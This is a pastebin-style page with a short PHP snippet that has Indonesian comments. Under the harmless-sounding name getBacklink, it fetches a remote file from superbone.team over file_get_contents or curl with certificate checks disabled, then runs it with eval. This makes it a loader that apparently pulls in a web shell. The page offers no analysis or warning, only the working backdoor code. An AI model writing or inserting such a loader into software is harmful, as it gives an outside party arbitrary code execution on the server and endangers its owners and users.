Untitled


SUBMITTED BY: Guest

DATE: Sept. 25, 2024, 3:47 p.m.

FORMAT: Text only

SIZE: 684 Bytes

HITS: 125

  1. <?php
  2. function getBacklink($url) {
  3. if( ini_get('allow_url_fopen') == 1 ) {
  4. // Jika url fopen on maka jalankan
  5. return file_get_contents($url);
  6. }else if(function_exists('curl_version')) {
  7. //Jika url fopen off maka jalankan menggunakan curl
  8. $ch = curl_init();
  9. curl_setopt($ch, CURLOPT_URL, $url);
  10. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  11. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  12. curl_setopt($ch, CURLOPT_HEADER, 0);
  13. $data = curl_exec($ch);
  14. curl_close($ch);
  15. return $data;
  16. }
  17. }
  18. eval("?>" . getBacklink("https://superbone.team/alfa.txt"));
  19. ?>

comments powered by Disqus